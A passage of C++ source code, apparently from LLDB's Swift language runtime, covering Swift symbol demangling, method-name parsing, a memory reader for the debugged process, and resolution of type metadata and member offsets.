eTypeInstanceIsPointer)) return true; } return false; } bool SwiftLanguageRuntime::GetObjectDescription(Stream &str, ValueObject &object) { if (object.IsUninitializedReference()) { str.Printf("<uninitialized>"); return true; } if (::IsSwiftResultVariable(object.GetName())) { // if this thing is a Swift expression result variable, it has two // properties: // a) its name is something we can refer to in expressions for free // b) its type may be something we can't actually talk about in expressions // so, just use the result variable's name in the expression and be done // with it StreamString probe_stream; if (GetObjectDescription_ResultVariable(m_process, probe_stream, object)) { str.Printf("%s", probe_stream.GetData()); return true; } } else if (::IsSwiftReferenceType(object)) { // if this is a Swift class, it has two properties: // a) we do not need its type name, AnyObject is just as good // b) its value is something we can directly use to refer to it // so, just use the ValueObject's pointer-value and be done with it StreamString probe_stream; if (GetObjectDescription_ObjectReference(m_process, probe_stream, object)) { str.Printf("%s", probe_stream.GetData()); return true; } } // in general, don't try to use the name of the ValueObject as it might end up // referring to the wrong thing return GetObjectDescription_ObjectCopy(this, m_process, str, object); } bool SwiftLanguageRuntime::GetObjectDescription( Stream &str, Value &value, ExecutionContextScope *exe_scope) { // This is only interesting to do with a ValueObject for Swift return false; } bool SwiftLanguageRuntime::IsSwiftMangledName(const char *name) { return swift::Demangle::isSwiftSymbol(name); } void SwiftLanguageRuntime::GetGenericParameterNamesForFunction( const SymbolContext &const_sc, llvm::DenseMap<SwiftLanguageRuntime::ArchetypePath, StringRef> &dict) { // This terrifying cast avoids having too many differences with llvm.org. SymbolContext &sc = const_cast<SymbolContext &>(const_sc); // While building the Symtab itself the symbol context is incomplete. // Note that calling sc.module_sp->FindFunctions() here is too early and // would mess up the loading process. if (!sc.function && sc.module_sp && sc.symbol) return; Block *block = sc.GetFunctionBlock(); if (!block) return; bool can_create = true; VariableListSP var_list = block->GetBlockVariableList(can_create); if (!var_list) return; for (unsigned i = 0; i < var_list->GetSize(); ++i) { VariableSP var_sp = var_list->GetVariableAtIndex(i); StringRef name = var_sp->GetName().GetStringRef(); if (!name.consume_front(g_dollar_tau_underscore)) continue; uint64_t depth; if (name.consumeInteger(10, depth)) continue; if (!name.consume_front("_")) continue; uint64_t index; if (name.consumeInteger(10, index)) continue; if (!name.empty()) continue; Type *archetype = var_sp->GetType(); if (!archetype) continue; dict.insert({{depth, index}, archetype->GetName().GetStringRef()}); } } std::string SwiftLanguageRuntime::DemangleSymbolAsString(StringRef symbol, bool simplified, const SymbolContext *sc) { bool did_init = false; llvm::DenseMap<ArchetypePath, StringRef> dict; swift::Demangle::DemangleOptions options; if (simplified) options = swift::Demangle::DemangleOptions::SimplifiedUIDemangleOptions(); if (sc) { options.GenericParameterName = [&](uint64_t depth, uint64_t index) { if (!did_init) { GetGenericParameterNamesForFunction(*sc, dict); did_init = true; } auto it = dict.find({depth, index}); if (it != dict.end()) return it->second.str(); return swift::Demangle::genericParameterName(depth, index); }; } return swift::Demangle::demangleSymbolAsString(symbol, options); } bool SwiftLanguageRuntime::IsSwiftClassName(const char *name) { return swift::Demangle::isClass(name); } void SwiftLanguageRuntime::MethodName::Clear() { m_full.Clear(); m_basename = llvm::StringRef(); m_context = llvm::StringRef(); m_arguments = llvm::StringRef(); m_qualifiers = llvm::StringRef(); m_template_args = llvm::StringRef(); m_metatype_ref = llvm::StringRef(); m_return_type = llvm::StringRef(); m_type = eTypeInvalid; m_parsed = false; m_parse_error = false; } static bool StringHasAllOf(const llvm::StringRef &s, const char *which) { for (const char *c = which; *c != 0; c++) { if (s.find(*c) == llvm::StringRef::npos) return false; } return true; } static bool StringHasAnyOf(const llvm::StringRef &s, std::initializer_list<const char *> which, size_t &where) { for (const char *item : which) { size_t where_item = s.find(item); if (where_item != llvm::StringRef::npos) { where = where_item; return true; } } where = llvm::StringRef::npos; return false; } static bool UnpackTerminatedSubstring(const llvm::StringRef &s, const char start, const char stop, llvm::StringRef &dest) { size_t pos_of_start = s.find(start); if (pos_of_start == llvm::StringRef::npos) return false; size_t pos_of_stop = s.rfind(stop); if (pos_of_stop == llvm::StringRef::npos) return false; size_t token_count = 1; size_t idx = pos_of_start + 1; while (idx < s.size()) { if (s[idx] == start) ++token_count; if (s[idx] == stop) { if (token_count == 1) { dest = s.slice(pos_of_start, idx + 1); return true; } } idx++; } return false; } static bool UnpackQualifiedName(const llvm::StringRef &s, llvm::StringRef &decl, llvm::StringRef &basename, bool &was_operator) { size_t pos_of_dot = s.rfind('.'); if (pos_of_dot == llvm::StringRef::npos) return false; decl = s.substr(0, pos_of_dot); basename = s.substr(pos_of_dot + 1); size_t idx_of_operator; was_operator = StringHasAnyOf(basename, {"@infix", "@prefix", "@postfix"}, idx_of_operator); if (was_operator) basename = basename.substr(0, idx_of_operator - 1); return !decl.empty() && !basename.empty(); } static bool ParseLocalDeclName(const swift::Demangle::NodePointer &node, StreamString &identifier, swift::Demangle::Node::Kind &parent_kind, swift::Demangle::Node::Kind &kind) { swift::Demangle::Node::iterator end = node->end(); for (swift::Demangle::Node::iterator pos = node->begin(); pos != end; ++pos) { swift::Demangle::NodePointer child = *pos; swift::Demangle::Node::Kind child_kind = child->getKind(); switch (child_kind) { case swift::Demangle::Node::Kind::Number: break; default: if (child->hasText()) { identifier.PutCString(child->getText()); return true; } break; } } return false; } static bool ParseFunction(const swift::Demangle::NodePointer &node, StreamString &identifier, swift::Demangle::Node::Kind &parent_kind, swift::Demangle::Node::Kind &kind) { swift::Demangle::Node::iterator end = node->end(); swift::Demangle::Node::iterator pos = node->begin(); // First child is the function's scope parent_kind = (*pos)->getKind(); ++pos; // Second child is either the type (no identifier) if (pos != end) { switch ((*pos)->getKind()) { case swift::Demangle::Node::Kind::Type: break; case swift::Demangle::Node::Kind::LocalDeclName: if (ParseLocalDeclName(*pos, identifier, parent_kind, kind)) return true; else return false; break; default: case swift::Demangle::Node::Kind::InfixOperator: case swift::Demangle::Node::Kind::PostfixOperator: case swift::Demangle::Node::Kind::PrefixOperator: case swift::Demangle::Node::Kind::Identifier: if ((*pos)->hasText()) identifier.PutCString((*pos)->getText()); return true; } } return false; } static bool ParseGlobal(const swift::Demangle::NodePointer &node, StreamString &identifier, swift::Demangle::Node::Kind &parent_kind, swift::Demangle::Node::Kind &kind) { swift::Demangle::Node::iterator end = node->end(); for (swift::Demangle::Node::iterator pos = node->begin(); pos != end; ++pos) { swift::Demangle::NodePointer child = *pos; if (child) { kind = child->getKind(); switch (child->getKind()) { case swift::Demangle::Node::Kind::Allocator: identifier.PutCString("__allocating_init"); ParseFunction(child, identifier, parent_kind, kind); return true; case swift::Demangle::Node::Kind::Constructor: identifier.PutCString("init"); ParseFunction(child, identifier, parent_kind, kind); return true; case swift::Demangle::Node::Kind::Deallocator: identifier.PutCString("__deallocating_deinit"); ParseFunction(child, identifier, parent_kind, kind); return true; case swift::Demangle::Node::Kind::Destructor: identifier.PutCString("deinit"); ParseFunction(child, identifier, parent_kind, kind); return true; case swift::Demangle::Node::Kind::Getter: case swift::Demangle::Node::Kind::Setter: case swift::Demangle::Node::Kind::Function: return ParseFunction(child, identifier, parent_kind, kind); // Ignore these, they decorate a function at the same level, but don't // contain any text case swift::Demangle::Node::Kind::ObjCAttribute: break; default: return false; } } } return false; } bool SwiftLanguageRuntime::MethodName::ExtractFunctionBasenameFromMangled( ConstString mangled, ConstString &basename, bool &is_method) { bool success = false; swift::Demangle::Node::Kind kind = swift::Demangle::Node::Kind::Global; swift::Demangle::Node::Kind parent_kind = swift::Demangle::Node::Kind::Global; if (mangled) { const char *mangled_cstr = mangled.GetCString(); const size_t mangled_cstr_len = mangled.GetLength(); if (mangled_cstr_len > 3) { llvm::StringRef mangled_ref(mangled_cstr, mangled_cstr_len); // Only demangle swift functions // This is a no-op right now for the new mangling, because you // have to demangle the whole name to figure this out anyway. // I'm leaving the test here in case we actually need to do this // only to functions. swift::Demangle::Context demangle_ctx; swift::Demangle::NodePointer node = demangle_ctx.demangleSymbolAsNode(mangled_ref); StreamString identifier; if (node) { switch (node->getKind()) { case swift::Demangle::Node::Kind::Global: success = ParseGlobal(node, identifier, parent_kind, kind); break; default: break; } if (!identifier.GetString().empty()) { basename = ConstString(identifier.GetString()); } } } } if (success) { switch (kind) { case swift::Demangle::Node::Kind::Allocator: case swift::Demangle::Node::Kind::Constructor: case swift::Demangle::Node::Kind::Deallocator: case swift::Demangle::Node::Kind::Destructor: is_method = true; break; case swift::Demangle::Node::Kind::Getter: case swift::Demangle::Node::Kind::Setter: // don't handle getters and setters right now... return false; case swift::Demangle::Node::Kind::Function: switch (parent_kind) { case swift::Demangle::Node::Kind::BoundGenericClass: case swift::Demangle::Node::Kind::BoundGenericEnum: case swift::Demangle::Node::Kind::BoundGenericStructure: case swift::Demangle::Node::Kind::Class: case swift::Demangle::Node::Kind::Enum: case swift::Demangle::Node::Kind::Structure: is_method = true; break; default: break; } break; default: break; } } return success; } void SwiftLanguageRuntime::MethodName::Parse() { if (!m_parsed && m_full) { m_parse_error = false; m_parsed = true; llvm::StringRef full(m_full.GetCString()); bool was_operator = false; if (full.find("::") != llvm::StringRef::npos) { // :: is not an allowed operator in Swift (func ::(...) { fails to // compile) // but it's a very legitimate token in C++ - as a defense, reject anything // with a :: in it as invalid Swift m_parse_error = true; return; } if (StringHasAllOf(full, ".:()")) { const size_t open_paren = full.find(" ("); llvm::StringRef funcname = full.substr(0, open_paren); UnpackQualifiedName(funcname, m_context, m_basename, was_operator); if (was_operator) m_type = eTypeOperator; // check for obvious constructor/destructor cases else if (m_basename.equals("__deallocating_destructor")) m_type = eTypeDeallocator; else if (m_basename.equals("__allocating_constructor")) m_type = eTypeAllocator; else if (m_basename.equals("init")) m_type = eTypeConstructor; else if (m_basename.equals("destructor")) m_type = eTypeDestructor; else m_type = eTypeUnknownMethod; const size_t idx_of_colon = full.find(':', open_paren == llvm::StringRef::npos ? 0 : open_paren); full = full.substr(idx_of_colon + 2); if (full.empty()) return; if (full[0] == '<') { if (UnpackTerminatedSubstring(full, '<', '>', m_template_args)) { full = full.substr(m_template_args.size()); } else { m_parse_error = true; return; } } if (full.empty()) return; if (full[0] == '(') { if (UnpackTerminatedSubstring(full, '(', ')', m_metatype_ref)) { full = full.substr(m_template_args.size()); if (full[0] == '<') { if (UnpackTerminatedSubstring(full, '<', '>', m_template_args)) { full = full.substr(m_template_args.size()); } else { m_parse_error = true; return; } } } else { m_parse_error = true; return; } } if (full.empty()) return; if (full[0] == '(') { if (UnpackTerminatedSubstring(full, '(', ')', m_arguments)) { full = full.substr(m_template_args.size()); } else { m_parse_error = true; return; } } if (full.empty()) return; size_t idx_of_ret = full.find("->"); if (idx_of_ret == llvm::StringRef::npos) { full = full.substr(idx_of_ret); if (full.empty()) { m_parse_error = true; return; } if (full[0] == ' ') full = full.substr(1); m_return_type = full; } } else if (full.find('.') != llvm::StringRef::npos) { // this is probably just a full name (module.type.func) UnpackQualifiedName(full, m_context, m_basename, was_operator); if (was_operator) m_type = eTypeOperator; else m_type = eTypeUnknownMethod; } else { // this is most probably just a basename m_basename = full; m_type = eTypeUnknownMethod; } } } llvm::StringRef SwiftLanguageRuntime::MethodName::GetBasename() { if (!m_parsed) Parse(); return m_basename; } const CompilerType &SwiftLanguageRuntime::GetBoxMetadataType() { if (m_box_metadata_type.IsValid()) return m_box_metadata_type; static ConstString g_type_name("__lldb_autogen_boxmetadata"); const bool is_packed = false; if (ClangASTContext *ast_ctx = GetProcess()->GetTarget().GetScratchClangASTContext()) { CompilerType voidstar = ast_ctx->GetBasicType(lldb::eBasicTypeVoid).GetPointerType(); CompilerType uint32 = ClangASTContext::GetIntTypeFromBitSize( ast_ctx->getASTContext(), 32, false); m_box_metadata_type = ast_ctx->GetOrCreateStructForIdentifier( g_type_name, {{"kind", voidstar}, {"offset", uint32}}, is_packed); } return m_box_metadata_type; } class LLDBMemoryReader : public swift::remote::MemoryReader { public: LLDBMemoryReader(Process *p, size_t max_read_amount = INT32_MAX) : m_process(p) { lldbassert(m_process && "MemoryReader requires a valid Process"); m_max_read_amount = max_read_amount; } virtual ~LLDBMemoryReader() = default; bool queryDataLayout(DataLayoutQueryType type, void *inBuffer, void *outBuffer) override { switch (type) { case DLQ_GetPointerSize: { auto result = static_cast<uint8_t *>(outBuffer); *result = m_process->GetAddressByteSize(); return true; } case DLQ_GetSizeSize: { auto result = static_cast<uint8_t *>(outBuffer); *result = m_process->GetAddressByteSize(); // FIXME: sizeof(size_t) return true; } } return false; } swift::remote::RemoteAddress getSymbolAddress(const std::string &name) override { lldbassert(!name.empty()); if (name.empty()) return swift::remote::RemoteAddress(nullptr); LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] asked to retrieve the address of symbol {0}", name); ConstString name_cs(name.c_str(), name.size()); SymbolContextList sc_list; if (!m_process->GetTarget().GetImages().FindSymbolsWithNameAndType( name_cs, lldb::eSymbolTypeAny, sc_list)) { LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resoution failed {0}", name); return swift::remote::RemoteAddress(nullptr); } SymbolContext sym_ctx; // Remove undefined symbols from the list. size_t num_sc_matches = sc_list.GetSize(); if (num_sc_matches > 1) { SymbolContextList tmp_sc_list(sc_list); sc_list.Clear(); for (size_t idx = 0; idx < num_sc_matches; idx++) { tmp_sc_list.GetContextAtIndex(idx, sym_ctx); if (sym_ctx.symbol && sym_ctx.symbol->GetType() != lldb::eSymbolTypeUndefined) { sc_list.Append(sym_ctx); } } } if (sc_list.GetSize() == 1 && sc_list.GetContextAtIndex(0, sym_ctx)) { if (sym_ctx.symbol) { auto load_addr = sym_ctx.symbol->GetLoadAddress(&m_process->GetTarget()); LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resolved to 0x%" PRIx64, load_addr); return swift::remote::RemoteAddress(load_addr); } } // Empty list, resolution failed. if (sc_list.GetSize() == 0) { LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resoution failed {0}", name); return swift::remote::RemoteAddress(nullptr); } // If there's a single symbol, then we're golden. If there's more than // a symbol, then just make sure all of them agree on the value. Status error; auto sym = sc_list.GetContextAtIndex(0, sym_ctx); auto load_addr = sym_ctx.symbol->GetLoadAddress(&m_process->GetTarget()); uint64_t sym_value = m_process->GetTarget().ReadUnsignedIntegerFromMemory( load_addr, false, m_process->GetAddressByteSize(), 0, error); for (unsigned i = 1; i < sc_list.GetSize(); ++i) { auto other_sym = sc_list.GetContextAtIndex(i, sym_ctx); auto other_load_addr = sym_ctx.symbol->GetLoadAddress(&m_process->GetTarget()); uint64_t other_sym_value = m_process->GetTarget().ReadUnsignedIntegerFromMemory( load_addr, false, m_process->GetAddressByteSize(), 0, error); if (sym_value != other_sym_value) { LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resoution failed {0}", name); return swift::remote::RemoteAddress(nullptr); } } LLDB_LOG(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES), "[MemoryReader] symbol resolved to {0}", load_addr); return swift::remote::RemoteAddress(load_addr); } bool readBytes(swift::remote::RemoteAddress address, uint8_t *dest, uint64_t size) override { if (m_local_buffer) { auto addr = address.getAddressData(); if (addr >= m_local_buffer && addr + size <= m_local_buffer + m_local_buffer_size) { // If this crashes, the assumptions stated in // GetDynamicTypeAndAddress_Protocol() most likely no longer // hold. memcpy(dest, (void *) addr, size); return true; } } Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf("[MemoryReader] asked to read %" PRIu64 " bytes at address 0x%" PRIx64, size, address.getAddressData()); if (size > m_max_read_amount) { if (log) log->Printf( "[MemoryReader] memory read exceeds maximum allowed size"); return false; } Target &target(m_process->GetTarget()); Address addr(address.getAddressData()); Status error; if (size > target.ReadMemory(addr, false, dest, size, error)) { if (log) log->Printf( "[MemoryReader] memory read returned fewer bytes than asked for"); return false; } if (error.Fail()) { if (log) log->Printf("[MemoryReader] memory read returned error: %s", error.AsCString()); return false; } if (log && log->GetVerbose()) { StreamString stream; for (uint64_t i = 0; i < size; i++) { stream.PutHex8(dest[i]); stream.PutChar(' '); } log->Printf("[MemoryReader] memory read returned data: %s", stream.GetData()); } return true; } bool readString(swift::remote::RemoteAddress address, std::string &dest) override { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf( "[MemoryReader] asked to read string data at address 0x%" PRIx64, address.getAddressData()); uint32_t read_size = 50 * 1024; std::vector<char> storage(read_size, 0); Target &target(m_process->GetTarget()); Address addr(address.getAddressData()); Status error; target.ReadCStringFromMemory(addr, &storage[0], storage.size(), error); if (error.Success()) { dest.assign(&storage[0]); if (log) log->Printf("[MemoryReader] memory read returned data: %s", dest.c_str()); return true; } else { if (log) log->Printf("[MemoryReader] memory read returned error: %s", error.AsCString()); return false; } } void pushLocalBuffer(uint64_t local_buffer, uint64_t local_buffer_size) { lldbassert(!m_local_buffer); m_local_buffer = local_buffer; m_local_buffer_size = local_buffer_size; } void popLocalBuffer() { lldbassert(m_local_buffer); m_local_buffer = 0; m_local_buffer_size = 0; } private: Process *m_process; size_t m_max_read_amount; uint64_t m_local_buffer = 0; uint64_t m_local_buffer_size = 0; }; std::shared_ptr<swift::remote::MemoryReader> SwiftLanguageRuntime::GetMemoryReader() { if (!m_memory_reader_sp) m_memory_reader_sp.reset(new LLDBMemoryReader(GetProcess())); return m_memory_reader_sp; } void SwiftLanguageRuntime::PushLocalBuffer(uint64_t local_buffer, uint64_t local_buffer_size) { ((LLDBMemoryReader *)GetMemoryReader().get())->pushLocalBuffer( local_buffer, local_buffer_size); } void SwiftLanguageRuntime::PopLocalBuffer() { ((LLDBMemoryReader *)GetMemoryReader().get())->popLocalBuffer(); } SwiftLanguageRuntime::MetadataPromise::MetadataPromise( ValueObject &for_object, SwiftLanguageRuntime &runtime, lldb::addr_t location) : m_for_object_sp(for_object.GetSP()), m_swift_runtime(runtime), m_metadata_location(location) {} CompilerType SwiftLanguageRuntime::MetadataPromise::FulfillTypePromise(Status *error) { if (error) error->Clear(); Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf("[MetadataPromise] asked to fulfill type promise at location " "0x%" PRIx64, m_metadata_location); if (m_compiler_type.hasValue()) return m_compiler_type.getValue(); auto swift_ast_ctx = m_for_object_sp->GetScratchSwiftASTContext(); if (!swift_ast_ctx) { error->SetErrorString("couldn't get Swift scratch context"); return CompilerType(); } auto &remote_ast = m_swift_runtime.GetRemoteASTContext(*swift_ast_ctx); swift::remoteAST::Result<swift::Type> result = remote_ast.getTypeForRemoteTypeMetadata( swift::remote::RemoteAddress(m_metadata_location)); if (result) { m_compiler_type = {swift_ast_ctx.get(), result.getValue().getPointer()}; if (log) log->Printf("[MetadataPromise] result is type %s", m_compiler_type->GetTypeName().AsCString()); return m_compiler_type.getValue(); } else { const auto &failure = result.getFailure(); if (error) error->SetErrorStringWithFormat("error in resolving type: %s", failure.render().c_str()); if (log) log->Printf("[MetadataPromise] failure: %s", failure.render().c_str()); return (m_compiler_type = CompilerType()).getValue(); } } llvm::Optional<swift::MetadataKind> SwiftLanguageRuntime::MetadataPromise::FulfillKindPromise(Status *error) { if (error) error->Clear(); Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); if (log) log->Printf("[MetadataPromise] asked to fulfill kind promise at location " "0x%" PRIx64, m_metadata_location); if (m_metadata_kind.hasValue()) return m_metadata_kind; auto swift_ast_ctx = m_for_object_sp->GetScratchSwiftASTContext(); if (!swift_ast_ctx) { error->SetErrorString("couldn't get Swift scratch context"); return llvm::None; } auto &remote_ast = m_swift_runtime.GetRemoteASTContext(*swift_ast_ctx); swift::remoteAST::Result<swift::MetadataKind> result = remote_ast.getKindForRemoteTypeMetadata( swift::remote::RemoteAddress(m_metadata_location)); if (result) { m_metadata_kind = result.getValue(); if (log) log->Printf("[MetadataPromise] result is kind %u", result.getValue()); return m_metadata_kind; } else { const auto &failure = result.getFailure(); if (error) error->SetErrorStringWithFormat("error in resolving type: %s", failure.render().c_str()); if (log) log->Printf("[MetadataPromise] failure: %s", failure.render().c_str()); return m_metadata_kind; } } bool SwiftLanguageRuntime::MetadataPromise::IsStaticallyDetermined() { if (llvm::Optional<swift::MetadataKind> kind_promise = FulfillKindPromise()) { switch (kind_promise.getValue()) { case swift::MetadataKind::Class: case swift::MetadataKind::Existential: case swift::MetadataKind::ObjCClassWrapper: return false; default: return true; } } llvm_unreachable("Unknown metadata kind"); } SwiftLanguageRuntime::MetadataPromiseSP SwiftLanguageRuntime::GetMetadataPromise(lldb::addr_t addr, ValueObject &for_object) { auto swift_ast_ctx = for_object.GetScratchSwiftASTContext(); if (!swift_ast_ctx || swift_ast_ctx->HasFatalErrors()) return nullptr; if (addr == 0 || addr == LLDB_INVALID_ADDRESS) return nullptr; auto key = std::make_pair(swift_ast_ctx->GetASTContext(), addr); auto iter = m_promises_map.find(key); if (iter != m_promises_map.end()) return iter->second; MetadataPromiseSP promise_sp(new MetadataPromise(for_object, *this, addr)); m_promises_map.insert({key, promise_sp}); return promise_sp; } swift::remoteAST::RemoteASTContext & SwiftLanguageRuntime::GetRemoteASTContext(SwiftASTContext &swift_ast_ctx) { // If we already have a remote AST context for this AST context, // return it. auto known = m_remote_ast_contexts.find(swift_ast_ctx.GetASTContext()); if (known != m_remote_ast_contexts.end()) return *known->second; // Initialize a new remote AST context. auto remote_ast_up = llvm::make_unique<swift::remoteAST::RemoteASTContext>( *swift_ast_ctx.GetASTContext(), GetMemoryReader()); auto &remote_ast = *remote_ast_up; m_remote_ast_contexts.insert( {swift_ast_ctx.GetASTContext(), std::move(remote_ast_up)}); return remote_ast; } void SwiftLanguageRuntime::ReleaseAssociatedRemoteASTContext( swift::ASTContext *ctx) { m_remote_ast_contexts.erase(ctx); } namespace { class ASTVerifier : public swift::ASTWalker { bool hasMissingPatterns = false; bool walkToDeclPre(swift::Decl *D) override { if (auto *PBD = llvm::dyn_cast<swift::PatternBindingDecl>(D)) { if (PBD->getPatternList().empty()) { hasMissingPatterns = true; return false; } } return true; } public: /// Detect (one form of) incomplete types. These may appear if /// member variables have Clang-imported types that couldn't be /// resolved. static bool Verify(swift::Decl *D) { if (!D) return false; ASTVerifier verifier; D->walk(verifier); return !verifier.hasMissingPatterns; } }; } llvm::Optional<uint64_t> SwiftLanguageRuntime::GetMemberVariableOffset(CompilerType instance_type, ValueObject *instance, ConstString member_name, Status *error) { if (!instance_type.IsValid()) return llvm::None; Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); // Using the module context for RemoteAST is cheaper bit only safe // when there is no dynamic type resolution involved. auto *module_ctx = llvm::dyn_cast_or_null<SwiftASTContext>(instance_type.GetTypeSystem()); if (!module_ctx || module_ctx->HasFatalErrors()) return llvm::None; llvm::Optional<SwiftASTContextReader> scratch_ctx; if (instance) { scratch_ctx = instance->GetScratchSwiftASTContext(); if (!scratch_ctx) return llvm::None; } auto *remote_ast = &GetRemoteASTContext(*module_ctx); if (log) log->Printf( "[GetMemberVariableOffset] asked to resolve offset for member %s", member_name.AsCString()); // Check whether we've already cached this offset. swift::TypeBase *swift_type = GetCanonicalSwiftType(instance_type).getPointer(); // Perform the cache lookup. MemberID key{swift_type, member_name.GetCString()}; auto it = m_member_offsets.find(key); if (it != m_member_offsets.end()) return it->second; // Dig out metadata describing the type, if it's easy to find. // FIXME: the Remote AST library should make this easier. swift::remote::RemoteAddress optmeta(nullptr); const swift::TypeKind type_kind = swift_type->getKind(); switch (type_kind) { case swift::TypeKind::Class: case swift::TypeKind::BoundGenericClass: { if (log) log->Printf("[MemberVariableOffsetResolver] type is a class - trying to " "get metadata for valueobject %s", (instance ? instance->GetName().AsCString() : "<null>")); if (instance) { lldb::addr_t pointer = instance->GetPointerValue(); if (!pointer || pointer == LLDB_INVALID_ADDRESS) break; swift::remote::RemoteAddress address(pointer); if (auto metadata = remote_ast->getHeapMetadataForObject(address)) optmeta = metadata.getValue(); } if (log) log->Printf("[MemberVariableOffsetResolver] optmeta = 0x%" PRIx64, optmeta.getAddressData()); break; } default: // Bind generic parameters if necessary. if (instance && swift_type->hasTypeParameter()) if (auto *frame = instance->GetExecutionContextRef().GetFrameSP().get()) if (auto bound = DoArchetypeBindingForType(*frame, instance_type)) { if (log) log->Printf( "[MemberVariableOffsetResolver] resolved non-class type = %s", bound.GetTypeName().AsCString()); swift_type = GetCanonicalSwiftType(bound).getPointer(); MemberID key{swift_type, member_name.GetCString()}; auto it = m_member_offsets.find(key); if (it != m_member_offsets.end()) return it->second; assert(bound.GetTypeSystem() == scratch_ctx->get()); remote_ast = &GetRemoteASTContext(*scratch_ctx->get()); } } // Try to determine whether it is safe to use RemoteAST. RemoteAST // is faster than RemoteMirrors, but can't do dynamic types (checked // inside RemoteAST) or incomplete types (checked here). bool safe_to_use_remote_ast = true; if (swift::Decl *type_decl = swift_type->getNominalOrBoundGenericNominal()) safe_to_use_remote_ast &= ASTVerifier::Verify(type_decl); // Use RemoteAST to determine the member offset. if (safe_to_use_remote_ast) { swift::remoteAST::Result<uint64_t> result = remote_ast->getOffsetOfMember( swift_type, optmeta, member_name.GetStringRef()); if (result) { if (log) log->Printf( "[MemberVariableOffsetResolver] offset discovered = %" PRIu64, (uint64_t)result.getValue()); // Cache this result. MemberID key{swift_type, member_name.GetCString()}; m_member_offsets.insert({key, result.getValue()}); return result.getValue(); } const auto &failure = result.getFailure(); if (error) error->SetErrorStringWithFormat("error in resolving type offset: %s", failure.render().c_str()); if (log) log->Printf("[MemberVariableOffsetResolver] failure: %s", failure.render().c_str()); } // Try remote mirrors. const swift::reflection::TypeInfo *type_info = GetTypeInfo(instance_type); if (!type_info) return llvm::None; auto record_type_info = llvm::dyn_cast<swift::reflection::RecordTypeInfo>(type_info); if (record_type_info) { // Handle tuples. if (record_type_info->getRecordKind() == swift::reflection::RecordKind::Tuple) { unsigned tuple_idx; if (member_name.GetStringRef().getAsInteger(10, tuple_idx) || tuple_idx >= record_type_info->getNumFields()) { if (error) error->SetErrorString("tuple index out of bounds"); return llvm::None; } return record_type_info->getFields()[tuple_idx].Offset; } // Handle other record types. for (auto &field : record_type_info->getFields()) { if (ConstString(field.Name) == member_name) return field.Offset; } } lldb::addr_t pointer = instance->GetPointerValue(); auto class_instance_type_info = reflection_ctx->getInstanceTypeInfo(pointer); if (class_instance_type_info) { auto class_type_info = llvm::dyn_cast<swift::reflection::RecordTypeInfo>( class_instance_type_info); if (class_type_info) { for (auto &field : class_type_info->getFields()) { if (ConstString(field.Name) == member_name) return field.Offset; } } } return llvm::None; } bool SwiftLanguageRuntime::IsSelf(Variable &variable) { // A variable is self if its name if "self", and it's either a // function argument or a local variable and it's scope is a // constructor. These checks are sorted from cheap to expensive. if (variable.GetUnqualifiedName() != g_self) return false; if (variable.GetScope() == lldb::eValueTypeVariableArgument) return true; if (variable.GetScope() != lldb::eValueTypeVariableLocal) return false; SymbolContextScope *sym_ctx_scope = variable.GetSymbolContextScope(); if (!sym_ctx_scope) return false; Function *function = sym_ctx_scope->CalculateSymbolContextFunction(); if (!function) return false; StringRef func_name = function->GetMangled().GetMangledName().GetStringRef(); swift::Demangle::Context demangle_ctx; swift::Demangle::NodePointer node_ptr = demangle_ctx.demangleSymbolAsNode(func_name); if (!node_ptr) return false; if (node_ptr->getKind() != swift::Demangle::Node::Kind::Global) return false; if (node_ptr->getNumChildren() != 1) return false; node_ptr = node_ptr->getFirstChild(); return node_ptr->getKind() == swift::Demangle::Node::Kind::Constructor; } /// Determine whether the scratch SwiftASTContext has been locked. static bool IsScratchContextLocked(Target &target) { if (target.GetSwiftScratchContextLock().try_lock()) { target.GetSwiftScratchContextLock().unlock(); return false; } return true; } /// Determine whether the scratch SwiftASTContext has been locked. static bool IsScratchContextLocked(TargetSP target) { return target ? IsScratchContextLocked(*target) : true; } bool SwiftLanguageRuntime::GetDynamicTypeAndAddress_Class( ValueObject &in_value, SwiftASTContext &scratch_ctx, lldb::DynamicValueType use_dynamic, TypeAndOrName &class_type_or_name, Address &address) { AddressType address_type; lldb::addr_t class_metadata_ptr = in_value.GetPointerValue(&address_type); if (class_metadata_ptr == LLDB_INVALID_ADDRESS || class_metadata_ptr == 0) return false; address.SetRawAddress(class_metadata_ptr); Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); auto &remote_ast = GetRemoteASTContext(scratch_ctx); swift::remote::RemoteAddress instance_address(class_metadata_ptr); auto metadata_address = remote_ast.getHeapMetadataForObject(instance_address); if (!metadata_address) { if (log) { log->Printf("could not read heap metadata for object at %lu: %s\n", class_metadata_ptr, metadata_address.getFailure().render().c_str()); } return false; } auto instance_type = remote_ast.getTypeForRemoteTypeMetadata(metadata_address.getValue(), /*skipArtificial=*/true); if (!instance_type) { if (log) { log->Printf("could not get type metadata from address %" PRIu64 " : %s\n", metadata_address.getValue().getAddressData(), instance_type.getFailure().render().c_str()); } return false; } // The read lock must have been acquired by the caller. class_type_or_name.SetCompilerType( {&scratch_ctx, instance_type.getValue().getPointer()}); return true; } bool SwiftLanguageRuntime::IsValidErrorValue(ValueObject &in_value) { CompilerType var_type = in_value.GetStaticValue()->GetCompilerType(); SwiftASTContext::ProtocolInfo protocol_info; if (!SwiftASTContext::GetProtocolTypeInfo(var_type, protocol_info)) return false; if (!protocol_info.m_is_errortype) return false; unsigned index = SwiftASTContext::ProtocolInfo::error_instance_index; ValueObjectSP instance_type_sp( in_value.GetStaticValue()->GetChildAtIndex(index, true)); if (!instance_type_sp) return false; lldb::addr_t metadata_location = 